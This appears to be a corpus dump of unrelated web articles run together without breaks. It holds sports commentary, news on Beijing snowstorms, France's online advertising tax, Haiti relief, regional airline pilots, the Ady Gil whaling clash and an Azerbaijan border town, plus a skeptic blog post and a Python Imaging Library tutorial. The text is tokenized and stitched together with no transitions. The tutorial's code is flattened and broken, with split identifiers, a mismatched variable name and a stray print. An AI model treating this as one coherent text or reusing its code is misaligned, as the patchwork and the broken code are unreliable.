Instead , the wheels came off : " Best Friends , " " Swing Shift , " " Protocol , " " Wildcats , " " Overboard , " " Bird on a Wire . "
You can have bad luck with scripts for an entire decade , but not that bad .
The truth is , she peaked from a looks standpoint by 1980 , followed by Hollywood turning to other actresses for the best roles .
In Bullock 's era , female stars are more ageless than ever because of teeth whitening , better hairstyling , better dieting , weight training , yoga , Pilates , liposuction , Botox , implants and everything else .
So she 's still chugging along at age 45 .
Does this mean she had a better career than Hawn did ?
Not when you factor the eras in .
OK , I need to get off this -- I could go on all day .
*** CLICK HERE FOR PART TWO ***
Bill Simmons is a columnist for ESPN.com .
For every Simmons column , as well as podcasts , videos and more , check out Sports Guy 's World .
His new book , " The Book of Basketball , " is now available .
BEIJING : Freak snowstorms and record low temperatures sweeping northern China are linked to global warming , say Chinese officials .
But , unlike the unseasonal snow falls that hit Beijing at the start of winter , the dump this week appears to have no link to the Government 's relentless efforts to change the micro climate .
A chilly new year ...
Beijing has been hit by freezing temperatures .
Credit : Getty Images
There are about 2000 weather modification offices in China , according to the media , which are responsible for bombing the skies with silver iodide to induce precipitation .
More than 2 million Beijing and Tianjin students were given the day off school yesterday because traffic was in chaos .
On Sunday the capital received its biggest snow dump since 1951 , immediately followed by the harshest Siberian winds in decades .
Companies that leverage the Internet to advertise to citizens should help support industries that are suffering thanks to the Internet , according to some in France .
The French government is considering a tax on companies that advertise online as a way to prop up creative industries that are having trouble keeping up with the digital world , such as musicians and publishers .
Unsurprisingly , the proposal has drawn criticism from those who believe governments should not be in the business of punishing Internet success and instead embrace the new things it has to offer .
The report was commissioned by France 's culture ministry and written by record producer Patrick Zelnik .
In it , Zelnik argued that big companies like Google , Yahoo , Facebook , AOL , and Microsoft should together be taxed up to � 20 million per year ( about US $ 29 million ) , even if their offices were not based in France .
This , he said , was in order to end " the endless enrichment without payback " — essentially , these companies should n't be able to make a buck off the clicks of French citizens without giving back to the French creative community .
This was only part of the 69 - page proposal , however ; other parts of the report discussed offering a public subsidy for citizens to buy music online , the creation of a licensing entity to ensure artists get paid for online music sales , and increased spending on the digitization of books .
It also suggested taxing ISPs based on traffic — that plus the " Google Tax " would add up to a total of � 50 million ( or about US $ 72 million ) in the first year .
Google , of course , did not quite agree with the reasoning behind the proposed tax .
Google France 's Director of Public Affairs Oliver Esper told
Ars that the company submitted a response to the report that emphasized the importance of Internet companies and cultural industries working together instead of in opposition .
" We hope that , among the recommendations contained in this report , the ones encouraging cooperation will be taken forward , such as proposals to simplify and adapt licensing mechanisms to the digital environment , " Esper said .
" There is the opportunity here to pursue innovative solutions , rather than encouraging a sense of opposition between the Internet and cultural industries , as the tax proposal does . "
French think tank Renaissance Num�rique had a much stronger reaction to the proposal , saying on its website that it was appalled by the " blatant disregard of the Internet and communication technologies . "
The firm questioned why Internet advertisers are responsible for artists ' lost income , and strongly urged the government to take a more entrepreneurial approach to the Internet .
" Let 's stop demonizing the Internet and look at the benefits of the web ! " said Renaissance Num�rique co-president Christine Balagu� in a statement .
France 's government has not traditionally been known for being " Internet friendly " — it has long been under fire for its three - strikes laws that keep getting passed into legislature ( but have yet to be enacted ) .
And , this is not the first time France has tried to tax ISPs in order to fund public media .
The " Google Tax " still has a ways to go before it becomes a law in France , but we would n't be surprised to see the proposal gather momentum in the coming months .
why you should support your skeptics
Science and skeptical blogs seem to be everywhere .
Unfortunately their combined audience pales in comparison to the bully pulpits of committed cranks and anti-science activists on a mission .
Ah the lifestyle of the web skeptic .
The champagne , the caviar , the private jets , the exclusive parties at a posh nightclub every weekend , and more beautiful women than the eye can see just itching to strike up a lecture on the latest theories in astrophysics .
On top of that , people across the world rush to fund those who try their best to spread science and reason with giant briefcases full of cash .
Oh. Wait . Sorry .
That ’s not quite right .
Usually , it ’s those who peddle pseudoscience for a living who have the cash , fame and media attention .
Just note the prevalence of ghost hunters , quack doctors , anti-science televangelists and those spreading the word of woo full time on your television set .
And this is not to mention how virulent and persistent they are on the web …
As noted before , woo makes for good business and while the web allows a lot of great information to spread across the world in no time at all , it also allows pseudoscience to spread just as efficiently .
The web makes no judgments about the correction or the validity of the information it hosts .
It ’s just data floating between vast arrays of servers .
But even TV networks and news agencies who do have editorial control over what they ’ll put out , choose time and time again to present something as controversial , to give every crank a voice and every maniac a bullhorn to sound off , regardless of the validity of what they say .
By contrast , most science bloggers who know how to debunk such claims , set the record straight and promote the kind of science and reason we should all exercise do it in their spare time , and most get lost in the online chaos , and many scientists seeing what ’s going on in the media and on the web , do n’t want any part in this mess .
And that presents us with a major problem .
The contest between good science and woo is highly asymmetric with many part - time skeptics who need to make a living , trying to stem the tide of endless pseudoscience and anti-intellectualism coming from people for whom peddling agendas that run contrary to science and reason is a full time job .
Politicians who attack scientific projects as a waste of public money do it to get themselves a better shot at another term .
Ken Ham who built the museum of ignorance in Kentucky runs a group with a very significant cash flow and enjoys a salary on par with an upper level corporate manager .
The blowhards who work for the Discovery Institute also get six figure salaries and millions in grants .
Deepak Chopra makes a killing by peddling woo and it ’s a safe bet that Ray Comfort can make his mortgage payments .
The cranks are deeply committed to spreading ever more anti-science because that ’s what pays the bills .
And when it comes to the anti-vax movement , we ’re talking about a quasi-religion with a terrifying grudge against medicine .
So here ’s the question , what can you do about it ?
Should you just send all the cash you can to JREF or blogs you think are doing a great job battling pseudoscience ?
While that certainly would n’t hurt , there are more ways to help skeptics make a difference in the media without spending a dime .
All you need is to apply just a little effort .
When you see a good skeptical or educational article , send it around , submit it to a social bookmarking site , or link to it on your blog if you have one .
Send it out via Twitter or discuss it in a forum you frequent .
If you see pseudoscience being reported by news agencies , contact their editors with links to skeptical analyses on the situation , especially when it comes to local media outlets .
Basically , go out and spread science and good skepticism as far and wide as you can .
It sounds so basic and simple , but so few people actually do it that the media at large is barely aware of skeptical movements .
By constantly reminding them about growing skeptical blogs with links , you would help raise the profile of the skeptics and the readership of their blogs .
I know this seems like a very simplistic and almost obvious method , but the problem is that so few people do it and without taking the time to really spread the word about good skeptical and popular science blogs which offer real insights and solid facts , skeptics will always only reach a limited audience .
Of course the skeptics need to play a part in this too .
We need to work together and help with linking and word of mouth references while keeping fresh content and good science coming at a steady pace .
One good place to start would be to submit your information to Grassroots Skeptics and get involved with local skeptic groups as well as reach out to new audiences .
Try to get your work syndicated and yes , go ahead and treat your blog like a business so you can set traffic goals , create promotional plans and expand your audience .
And above all , remember a very important point .
You need to engage people , challenge their beliefs and promote discussion .
There ’s the often made assumption that the facts speak for themselves but in reality , data is mute .
You need to animate it and expose the agendas of those who try to spread pseudoscience for cash and personal fame .
Then your message will be far more effective when readers choose to disseminate it into the media world .
For a quick weekend adventure I decided to play around with using Python Imaging Library to take an arbitrary collection of photos and generate a photo gallery .
With the help of the PIL documentation this turned out to be quite fun .
( Full code available on Github . )
The pictures I 'm editing are all my own , and come from my post about Kamioka , the town where I lived a couple years ago .
First , let 's just load and resave an image without modifying it .
>>> import Image import Image >>> img = Image . open ( " kamioka.png " ) img = Image.open ( " kamioka.png " ) >>> img . save ( " kam2.png " ) img.save ( " kam2.png " )
The saved image is identical to the original , which the kind reader likely has n't yet seen .
I admit , not too exciting .
Next , let 's try creating a new image with two copies of that first image .
def mirror ( img , n = 2 ) : x , y = img .
size mirror_img =
Image . new ( " RGB " , ( x * n , y ) , " White " ) for i in range ( 0 , n ) : mirror_img .
paste ( img , ( i * x , 0 ) ) return mirror_img
Which we can then use to create an image with two copies .
>>> img = Image . open ( " kamioka.png " ) img = Image.open ( " kamioka.png " ) >>> mirror ( img ) . save ( " kam3.png " ) mirror ( img ) .save ( " kam3.png " )
We can also use it to make an image with a few more copies .
>>> img = Image . open ( " kamioka.png " ) img = Image.open ( " kamioka.png " ) >>> mirror ( img , n = 5 ) . save ( " kam3_2.png " ) mirror ( img ) .save ( " kam3_2.png " )
Here it is with five copies .
Now , let 's try creating borders for the pictures to add a bit of sophistication .
Let 's start with a monochrome border .
def border ( img , width = 10 , color = " White " ) : x , y = img .
size bordered =
Image . new ( " RGB " , ( x + ( 2 * width ) , y + ( 2 * width ) ) , color ) bordered .
paste ( img , ( width , width ) ) return bordered
Here is a mirroring of a white bordered image .
>>> img = Image . open ( " kamioka.png " ) img = Image.open ( " kamioka.png " ) >>> mirror ( border ( img ) ) . save ( " kam4.png " ) mirror ( border ( img ) ) .save ( " kam4.png " )
I have to admit this is a pretty unimpressive border .
The border function can be expanded to make it possible to customize borders a bit more .
Instead of assuming a border has a width and a color , let 's describe a border as a list of width / color tuples .
def border ( img , brdrs = [( 2 , " White " ) , ( 8 , " Black " ) , ( 1 , " Grey " ) ] ) : x , y = img .
size width = sum ( [ z [ 0 ] for z in borders ] ) bordered = Image . new ( " RGB " , ( x + ( 2 * width ) , y + ( 2 * width ) ) , " Grey " ) offset = 0 print offset for b_width , b_color in brdrs : bordered .
paste ( Image . new ( " RGB " , ( x + 2 * ( width - offset ) , y + 2 * ( width - offset ) ) , b_color ) , ( offset , offset ) ) offset = offset + b_width bordered .
paste ( img , ( offset , offset ) ) return bordered
Once again calling border ,
>>> mirror ( border ( img ) ) . save ( " kam5.png " ) mirror ( border ( img ) ) .save ( " kam5.png " )
which brings us :
Now that we 've improved upon the border a bit , let 's make a function which takes a list of images and displays them together neatly .
To keep things simple , here are a few compromises we 'll make :
we 'll scale all images to have the same height ,
we 'll break pictures into chunks where the largest chunk is the size of the smallest original image ,
we 'll tile the pictures uniformly .
First we need to normalize all the height of all images such that they are all the height of the shortest image .
def normalize ( imgs ) : " Normalize height for all images to shortest image . " shortest = min ( [ x . size [ 1 ] for x in imgs ] ) resized = [ ] for img in imgs : height_ratio = float ( img . size [ 1 ] ) / shortest new_width = img . size [ 0 ] * height_ratio im g2 = img .
resize ( ( new_width , shortest ) , Image .
ANTIALIAS ) resized .
append ( im g2 ) return resized
Next , we break wider images into chunks where each chunk is as wide as the skinniest image .
def chunk ( imgs ) : " Break images into chunks equal to size of smallest image . " smallest = min ( [ x . size [ 0 ] for x in imgs ] ) height = imgs [ 0 ] . size [ 1 ] chunked_imgs = [ ] for img in imgs : parts = math .
ceil ( ( img . size [ 0 ] * 1.0 ) / smallest ) for i in xrange ( 0 , parts ) : box = ( i * smallest , 0 , ( i + 1 ) * smallest , height ) im g2 = img .
crop ( box ) im g2 . load ( ) chunked_imgs .
append ( im g2 ) return chunked_imgs
Third we need to tile the images into the album page .
( Note that merge assumes images have been normalized and chunked . )
def merge ( imgs , per_row = 4 ) : " Format equally sized images into rows and columns . " width = imgs [ 0 ] . size [ 0 ] height = imgs [ 0 ] . size [ 1 ] page_width = width * per_row page_height = height * math .
ceil (( 1.0 * len ( imgs ) ) / 4 ) page = Image . new ( " RGB " , ( page_width , page_height ) , " White " ) column = 0 row = 0 for img in imgs : if column !=
0 and column % per_row == 0 : row = row + 1 column = 0 pos = ( width * column , height * row ) page .
paste ( img , pos ) column = column + 1 return page
Finally , we wrap up these function calls into the album function which uses them together and also adds a border .
def album ( imgs ) : imgs = normalize ( imgs ) imgs = chunk ( imgs ) imgs = [ border ( x ) for x in imgs ] return merge ( imgs )
Now , creating the first album .
>>> album ( imgs ) . save ( " album.png " ) album ( imgs ) .save ( " album.png " )
Here I used all the images from the Kamioka article , which happened to already be of the same sizes .
And here is the output applied against the original images plus the output of the first call to album .
So , that looks totally horrible , but with better choices of images it might actually look decent .
I certainly enjoyed getting to work with PIL , and I hope some of the snippets from this meandering project serve as helpful examples .
Americans and concerned observers worldwide watched Haiti tremble after a magnitude 7.0 earthquake Tuesday evening , and many immediately asked : How can I help ?
Relief organizations largely say that right now , money donations are needed more than additional aid volunteers .
“ It ’s a bit of a tough one for impromptu volunteers to enter into the fold , ” says Richard Muffley , spokesman for the Center for International Disaster Information ( CIDI ) in Washington .
Unsolicited volunteers may not have the needed training from aid organizations and will still need to be fed and housed once in a disaster zone , he says .
“ Cash is truly the most economical and efficient way of making a contribution . ”
But Mr. Muffley and other aid organizations also say there are still opportunities to be hands - on with Haiti earthquake relief – which , they note , will continue long after the shock the quake triggered this week .
How you can volunteer now
For medical workers , the International Medical Corps is still open .
“ We are taking applications for volunteer doctors and nurses , but we have a particular need for nurses , ” says Crystal Wells , the group ’s communications officer in Chicago .
Applicants can fill out their information on the " Work with Us " tab of their website .
Both medical and non-medical workers can register their offer of services with the CIDI on their website : http://www.cidi.org/default.htm.
Aid agencies browse the listings and call on those whose services match their needs .
Muffley adds that hands - on events outside of Haiti , like baked goods and yard sales , can generate much - needed donations .
The Red Cross is not accepting volunteers to travel to Haiti now , but both they and the International Medical Corps say that later , they may need volunteer health - care personnel .
“ Down the road , [ Haiti will need ] more medical people , translators , things like that , ” says Nadia Pontif of the American Red Cross .
She encourages interested volunteers to contact their local Red Cross chapter to get the appropriate disaster training now .
Social - media volunteering
Aid staffers emphasized the role that social media are playing in Haiti relief , to solicit donations , help Haitian families get information about their relatives , and follow the island ’s news .
The Red Cross has set up a Family Links database here for relatives to find their Haitian family after the quake .
Since yesterday , 14,000 people have registered on the site and more than 1,000 people in Haiti have written to the Red Cross to say that they are alive , says Anna Nelson , a spokeswoman in Geneva .
“ Even if [ someone who wants to help ] does n’t know any Haitians , they can put this on their Facebook ” and let friends know to pass along the database , Ms. Nelson adds .
Ms. Wells of the International Medical Corps says they ’re looking for social - media volunteers to monitor their website , which they continuously update to show which donations they need at a given time and who is needed on the ground .
“ That ’s kind of a different way to volunteer that does make a big impact , ” Wells adds .
Marvels from Mars : Stunning postcards from the Red Planet
The Red Planet , Mars , fascinates us like no other celestial body .
We have yet to visit the most Earth - like world in the solar system in person , but since the Sixties a small armada of space probes have poked and prodded the dusty Martian surface .
And , as these astonishing images show , they have taken the most spectacular close - up pictures while orbiting the planet .
Because Mars has so little air , and certainly no substantial running water and no vegetation , the processes of weathering and erosion , so important on Earth , operate differently on Mars .
Valley of mystery :
This chasm looks as if water once flowed through it
Jagged edge :
The rim of Victoria Crater , home to a field of sand dunes , was caused by erosion
Pink and blue desert :
Trails of dune debris blown across the harsh landscape , left , and rock formations look like alien sea creatures , right
The result is that Mars is covered with spectacular , near - vertical cliffs , huge rubblestrewn plains and vertiginous crater edges .
Future tourists , if there are any , will be able to gaze over colossal canyons - one of which , the 2,500 - mile - long Valles Marineris , would swallow our Grand Canyon .
What look like ancient river beds snake across the ochre plains - evidence , perhaps , of a warmer , wetter past .
Mars is home not only to the solar system 's longest , deepest canyon , but also to the biggest volcano ( Mount Olympus , at 89,000 ft - three times as high as Everest and with a base bigger than all of Great Britain ) , the deepest craters , the tallest cliffs and huge seas of sand , built up over countless millions of years by the thin , but relentless Martian winds .
In the groove : Valles Marineris , at more than 100 miles wide , dwarfs the Grand Canyon
Devil 's punch bowl ?
The mouth of Albor Tholus , an extinct volcano , is 30 km across
There are oddities on the Martian surface , too ; craters that look like hearts , and the famous ' Happy Face ' crater in the Nereidum Montes mountains .
Our next - door neighbour : Mars
And around the Martian poles are strange , spider - like formations that may be some sort of 'ice geysers ' .
This is indeed an alien world .
Ever since the 19th century , scientists have been arguing just how Earth - like Mars is - but by the 1970s , most thought Mars was dead , almost devoid of an atmosphere , perishingly cold and almost certainly not the abode for life .
The first space probes showed a surface more like that of the Moon than Earth , with a thin , parched , whistling atmosphere which would suck your lungs dry in an instant were you to venture onto the surface without a spacesuit .
But now , opinion has swung back to a rather more benign Mars , as a closer look reveals that the Red Planet may not be as hostile as we thought .
The two NASA rovers , Spirit and Opportunity , which have been trundling around the Martian surface since 2004 , have discovered ancient rocks which may have been formed in long - dried - up Martian seas .
We have not found life - not even microbes , let alone Little Green Men - but many scientists believe that there may have been life in the past that survives , perhaps buried underground , to this day .
Controversy surrounds the possible existence of liquid water on the Martian surface - a probable prerequisite for life .
Some tantalising pictures , taken by the Mars Global Surveyor probe from orbit , showed what look like small springs or streams gushing down steep cliffs .
Mars is equal in area to the land - surface of the Earth - the planet is smaller than our world and has no oceans .
But what no one disputes is that it has a beauty out of this world .
Red crescents : Scalloped sand cliffs ripple across the surface
Cold mountain : Patterns on this range could have been caused by glaciers
Boulders or bacteria ?
Rocky outcrops at the south pole of the planet , left , and Giant craters scar the planet ’s surface , right
The old hands say there was never much glamour in piloting several tonnes of metal thousands of feet in the air .
But there 's no denying that to the earthbound back in the jet - set era half a century ago – when Pan Am's " Clippers " ruled the air lanes and service was modelled on transatlantic ocean liners – pilots were regarded with an awe just short of that accorded to astronauts .
The exotic blend of international travel , the authority of commanding the ever larger and faster airliners , and those dashing uniforms turned heads , drew autograph hunters and attracted groupies .
Pilots also made a lot of money .
Today it is different .
Captain Dave Ryter earned so little when he was a co-pilot for a major airline that he lived in a gang area of Los Angeles , commuted for hours to work and made less money than a bus driver .
" I was standing at a gate waiting to commute a few years ago .
I was in uniform and a passenger walks over to me and strikes up a conversation as people often do .
He said : where 's your second home ?
I looked at him , thinking he was making a joke .
He was serious .
I said : actually , it 's my parents ' , " said Ryter .
" I was living in a very small town home in a gang area and my wife also worked for the two of us to support our family . "
Anyone waiting for their underpants to be checked knows that the glamour went out of flying years ago .
But nowhere has the cachet fallen so far as in the US , where pilots on commuter airlines responsible for more than half the country 's flights now earn pitifully low salaries for long , unsocial hours .
Cachet
Many are forced to fly half way around the country before they even begin work .
Others sleep in trailers at the back of Los Angeles airport , in airline lounges across the country or even on the floors of their own planes .
Some co-pilots , who typically take home about $ 20,000 ( £ 12,500 ) a year , hold down second jobs to make ends meet .
Unless they have come through the military , many pilots also start their first jobs deeply in debt .
" Many of them come to these jobs with $ 150,000 of debt for a $ 15,000 - $ 20,000 starting job , " said Ryter .
" It 's hard to make the economics of that work out .
But there 's a theory that one day they 'll make a lot more money than that .
Maybe they will , maybe they wo n't .
But the problem is they are in , for a number of years , quite a hard haul and there 's certainly no glamour .
That 's long since gone . "
The result is not only the diminishing of a once coveted profession but increasing concerns about safety as many pilots are worked to the very limits of regulations , leaving them exhausted as well as relatively poor .
The largest union for pilots , the Air Line Pilots Association ( Alpa ) , traces the change back about 20 years , when the smaller domestic airlines stopped selling their own tickets and began competing for contracts to act as local extensions of the major carriers .
To win contracts they slashed costs , which included forcing down pay and demanding more of pilots .
Then came the 9/11 attacks , which pushed some airlines into bankruptcy and others to cut costs even further .
Many pilots lost their jobs .
Even those on some of the biggest airlines saw their pay slashed by as much as half .
But it is the regional pilots who have the toughest time .
Ryter 's salary rose to $ 72,000 ( £ 45,000 ) a year when he was promoted to captain three years ago , but many co-pilots have little prospect of promotion for years .
More than half of all regional pilots commute to work – which often means several hours in the jump seat of another aircraft before they begin their own job – largely because they are not paid enough to be able to afford to live in the major cities , such as New York or Miami , where their employers are based .
Ryter said that smaller airlines also regularly shifted where their aircraft and pilots are based according to the needs of the big carriers , but pilots were reluctant to uproot their families , pull children out of school and sell houses only to be moved again in a year .
" In the post - 9/11 world , when companies have done everything they can to reduce costs , there have been changes that have really made the piloting job very challenging , very fatiguing , very demanding .
" With our schedules now it 's very common to leave one of the pilot domiciles and not see it for three or four days while you 're flying around the nation in multiple time zones .
Without doubt the effect is that you are physically and mentally tired .
" The airlines have stayed right on the hairy edge of federal aviation regulations . "
The conditions in which commuter pilots now work were laid bare by an investigation into a crash near Buffalo , New York , that killed 50 people last year .
It was revealed that neither the pilot , Marvin Renslow , nor co-pilot , Rebecca Shaw , had a proper night 's sleep before the flight .
Shaw , 24 , was paid so little – just $ 16,200 ( £ 10,000 ) a year – that she held a second job in a coffee shop and lived with her husband at her parents ' house across the country in Seattle .
The night before the doomed flight , Shaw flew for several hours in the jump seat of two FedEx courier flights to reach her job at Newark airport and slept a few hours in the pilots ' lounge .
Renslow also slept in the lounge after flying up to work from Florida , even though it was barred by the airline , Colgan Air , because of the regular disturbance from other pilots coming and going .
The investigation revealed that Shaw 's text messages just before the flight said she felt exhausted .
Both pilots can be heard yawning on the voice recorder .
During the flight , Shaw told Renslow that her husband , a soldier , was paid " more in one weekend of drill than I make [ in a fortnight ] " .
The co-pilot also reflected her relative inexperience by commenting that she had never seen so much ice on a plane , as it made its way through freezing weather .
That was to prove an ominous observation .
As the plane came in to land in bad weather at Buffalo the pilots did not notice their speed slow too much until an alarm sounded .
Renslow did the opposite to what he should have done and caused the plane to stall .
Experts told the investigation that Renslow's and Shaw 's evident lack of comprehension as to why the alarm was sounding suggested insufficient training .
One of the inquiry officials , Kitty Higgins , said she believed that the two pilots ' working conditions had contributed to the accident .
" When you put together the commuting patterns , the pay levels , the fact that the crew rooms are n't supposed to be used [ for sleeping ] but are being used , I think it 's a recipe for an accident , " she said .
The head of the National Transportation Safety Board , Mark Rosenker , said that paying very low wages , knowing that it would result in pilots commuting long distances to get to work , was " winking and nodding " at safety .
Accident
Alpa 's vice - president , Captain Paul Rice , a 35 - year airline veteran now flying transatlantic routes , says that the industry still remains extremely safe compared with other forms of travel .
But he is concerned that it has driven out more experienced pilots while giving the legal minimum of training to new recruits to cut costs .
" If you constantly remove elements of training , and training that once took three weeks is down to one week , it 's easy to see how there 's less time to pass knowledge along , practise certain manoeuvres , things like that , " he said .
" The public needs to ask the question : is it worth it to always look at prices as the driving factor ?
Our managements and the investors in the airlines need to think about what is the cost of safety . "
Many of the more experienced pilots who lost jobs on major airlines got out of the industry because they faced working for entry - level wages if they shifted to smaller carriers .
" If you can go down the street and get a job at Home Depot or in real estate where wages are substantially higher than at a regional carrier , that 's probably where you 're gonna go , " said Ryter .
" Our new entry pilots are right down at the food stamp wages .
They can't afford to start over at a regional carrier . "
Yet while the glamour may have gone , there remains a certain pull for pilots such as Ryter .
" It 's all I ever wanted to do .
I know we 're talking about the negatives , of which there are many , but I still love what I do – being able to get into an aircraft that you could never afford to rent on your own , and be able to pilot it around the nation .
I still love the business , " he said .
The New Zealand - registered whaling protest ship Ady Gil , which collided on Wednesday with a Japanese whaling ship , has sunk while being towed , Sea Shepherd conservation society spokesman Paul Watson says .
Meanwhile , former Conservation minister Chris Carter - who took a prominent role when the whale wars in the Southern Ocean went awry in 2007 - says Foreign Minister Murray McCully 's " passive role " in the latest debacle is putting the lives of protesters at risk .
Captain Watson told ABC Radio the crew of the Bob Barker - the Sea Shepherd group 's newest ship to take to the waters - tried all day on Thursday to salvage the the $ 1.5 million vessel .
But attempts to tow the badly - damaged vessel failed and the crew was unable to keep it afloat .
Before the boat sank the crew removed all oil and fuel to avoid any pollution in the sea .
Captain Watson said the group had no other option other than to try and move the Ady Gil or abandon it .
" The Japanese harpoon vessels stayed close by but offered no assistance at any time . "
Asked if they should have provided assistance , he said : " Well , they were responsible , they destroyed the vessel and the effort to try and keep it from polluting the ocean , I think , they should have offered some sort of assistance but they did n't .
" They refused to acknowledge any distress signal . "
JoAnne McArthur / Sea Shepherd ADY GIL :
The crew of a hi-tech anti-whaling trimaran rammed by a Japanese ship , describe it as attempted murder .
One of the Ady Gil 's crew members broke two ribs in the collision .
Another of the group 's vessels , the Steve Irwin , deliberately stayed away to avoid being tailed by the Japanese whalers , Captain Watson said .
He said the Steve Irwin was in pursuit of another Japanese harpoon vessel , the Yushin Maru , and the crew did n't want the whaling fleet finding out their location .
Both the New Zealand and Australian governments have called for restraint over the whaling stoush and for both sides to respect human life .
However Captain Watson said they would n't restrain themselves from protecting whales .
" I think that the governments have shown so much restraint themselves over the years they 've done absolutely nothing . "
Mr Carter said the National - led Government had been " largely silent " while Japanese whalers continue to use dubious science as an excuse to continue to hunt whales in the Southern Ocean .
He said the Government did not bother to send a minister to the recent International Whaling Commission meeting in Portugal for the first time in 10 years .
" That absence was a clear signal that the New Zealand Government now sees whale conservation as a minor issue , " Mr Carter said .
Mr McCully 's " muted response " to Japanese whaling would damage New Zealand 's position as a leading conservation nation .
Government officials met with representatives from the Japanese embassy in Wellington to discuss the sinking , with Japan reported to have said it regarded the incident as " regrettable " but a " low - key event " .
But a spokesman for Australian Environment Minister Peter Garrett has told the ABC that neither the government nor the Australian Maritime Safety Authority received any request for help .
Australian Greens Senator Sarah Hanson - Young told ABC Television the Japanese should pick up the bill for the Ady Gil .
" Clearly we need the investigation to happen and obviously the Deputy Prime Minister ( Julia ) Gillard has said there will be one , " she said .
" But the big problem is that the evidence that this investigation will draw on is simply going to be taken from the Japanese because Australia was not down there . "
" The Australian Government have simply allowed this incident to happen by virtue of being absent in the entire activities of what 's going on . "
WHALING STOUSH
Japanese whalers and conservationists have squared off for more hostilities in the Antarctic , a day after the Ady Gil was crushed .
Sea Shepherd searched Antarctic waters by helicopter for a key Japanese whaling ship on Thursday , renewing its attempts to find and harass the whalers into giving up their hunt , Captain Watson said .
Japan kills about 1200 whales a year in Antarctica under what it says is a scientific programme allowed by the International Whaling Commission despite a broader moratorium on killing the mammals .
Critics say the programme is a front for illegal commercial whaling , and Sea Shepherd sends ships to Antarctica each season to try to stop the hunt - an effort portrayed on the Animal Planet TV series " Whale Wars . "
On Wednesday , the Japanese whaling ship Shonan Maru plowed into the Ady Gil , knocking the bow off the wave - piercing trimaran speedboat that is one of the group 's trio of vessels trying to harass the hunters out of business .
The whaling is conducted in international waters , but usually within the huge patch of ocean that is designated as Australia 's maritime rescue zone and that Canberra considers a whale sanctuary .
But rules governing Antarctica are not clear cut .
The frozen continent and the oceans around it are administered by agreement between nations , and there are conflicting claims about sovereignty .
" There is very little ability for a sort of police force to just turn up on the scene to separate the two sides " when then is a dispute such as Wednesday 's clash , said Don Rothwell , a professor in international law at the Australian National University who wrote a recent report for the government on Antarctic whaling .
It was possible Sea Shepherd could try to sue the whaling ship 's master for negligence in Wednesday 's clash , he said .
But the whalers could also try to have the Ady Gil charged with terrorism at sea for trying to foul its propellers with rope - a tactic Sea Shepherd openly says it uses .
Japan said it had asked countries that let the conservationists register their ships or use their ports to help curtail the group 's aggressive acts .
Sea Shepherd leader Paul Watson said Australia should send its navy or a customs vessel to stop what he calls illegal poaching .
But Wednesday 's clash was unlikely to produce any useful change in policy , and had actually raised the chances of a further escalation in the whaling face - off , said Rothwell .
" This is the great fear at the moment , " he said .
" Sea Shepherd is using very strong language , talking about a war with the Japanese , " he said .
" Increasingly , the Japanese have become more aggressive in their responses - we can expect that there will be more clashes . "
Neither side show signs of backing down .
" The series of sabotage acts by the Sea Shepherd were very dangerous and risked the life and safety of the Japanese crew members , " Japanese Foreign Ministry spokesman Yasuhisa Kawamura told reporters in Tokyo .
Watson vowed his group would not step back , saying " We now have a real whale war on our hands . "
He said a helicopter from the group 's main ship , Steve Irwin , was launched on Thursday to try to find the Japanese fleet 's whale processing ship and resume attempts to disrupt the whalers .
Acting Australian Prime Minister Julia Gillard said there were no immediate plans to send a government vessel to the region .
She said Canberra 's ability to act was hampered because Japan did not recognise Australia 's jurisdiction in the region .
" This is an issue where emotions run high , " Gillard told reporters .
" I am saying to everyone out in these dangerous and inhospitable waters that this is a time for calm judgments .
We do not want to see people taking risks that result in a loss of life . "
- with NZPA and AP
Astara does n’t scream so much as strongly hint at the possibility of sin .
Next to the customs terminal ’s courtyard and above the row of babushkas selling tea and beef kebabs , there ’s a convenient motel ( “ Ideal for bringing the girls back to , ” one Iranian told me ) .
The fluorescent - lit cafés on Aliyarbeyov Street are stocked with Russian vodka and French cognac , and the Turkish Salon , on Fountain Square , offers , among other things , tattoos , piercings , astrological forecasts , and “ full - body massage . ”
All of this is made possible by the Azerbaijanis ’ somewhat attenuated relationship with God , the product of seven decades of Communist rule and a steady influx of Westerners after oil was discovered in the mid-1800s .
Iranians find the Azerbaijanis ’ mildly ironic attitude toward Islam a welcome relief from the stern theocracy of the ayatollahs .
During Ramadan many Azerbaijanis do not fast , and the cafés in Astara do a bustling lunch business , serving lamb shashlik , or barbecue , to visiting Iranians .
Manana Shafieva , a stylist at the Turkish Salon , said many Iranian men bring in their wives to be spruced up .
“ They say , ‘ I know she can be beautiful .
Can you make her beautiful ? ’
They know we know about hair and what it means to have a modern image . ”
But the Iranian mullahs are not merely concerned about the affectations of modernity .
Mamedli , the cab driver , said that the crowds lining up for entry to Astara have surged since June , when hundreds of thousands of Iranians protested the allegedly rigged reelection of President Mahmoud Ahmadinejad .
This has worrisome implications : the potential for political upheaval is acute in Iran ’s north , where the bulk of the country ’s university students live , along with most of its 15 million to 30 million ethnic Azeris ( out of a total population of about 73 million ) .
Prominent ethnic Azeris in Iran include Ahmadinejad ’s presidential rival , Mir-Hossein Moussavi , the poet Mohammad Hossein Shahriar , and the filmmaker Kamal Tabrizi .
Even the supreme leader of Iran , Ayatollah Ali Khamenei , is part Azeri .
Many Azeris are so swollen with ethnic pride that Iranian officials suspect them of dual loyalty .
As a result , an Azerbaijani Ministry of Foreign Affairs official told me , “ it ’s common knowledge that the Iranians want the border shut down . ”
At night , the courtyard next to the customs terminal was empty except for a few malnourished cats .
On the Iranian side of the border , an imam and his flock were praying .
Their voices drifted across the river and through the mesh of walls and fences .
On Fountain Square , kids blasted Israeli pop music .
A guard stopped me as I navigated the darkened market stalls , redolent of tea and rotting nectarines .
“ The border is closed until morning , ” he said .
Then he nodded at the motel .
“ You want a room ?
It ’s very nice , with a television and a girl . ”
I said I was staying near the square and just taking a stroll .
“ Only 10 manats , ” he persisted .
“ I can get you this .
Anything you want . ”
I laughed , and he lit a cigarette .
“ Come on , ” he said , “ do n’t be a Muslim . ”
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
It was the story of two brothers who promoted concerts in the rustbelt town of Buffalo and dreamed of making it big in the movies .
Bob and Harvey Weinstein went on to reshape Hollywood with their company Miramax , collecting armfuls of Oscars and launching the careers of some of the most influential names in American cinema , including the directors Quentin Tarantino , Steven Soderbergh and Kevin Smith , bringing independent cinema to a wider audience .
They sold Miramax to Walt Disney but remained at the helm for more than a decade before chaffing at the corporate bit , falling victim to their own hubris with a slate of big budgets films and quitting in 2005 .
Then , this week , the final credits started to roll .
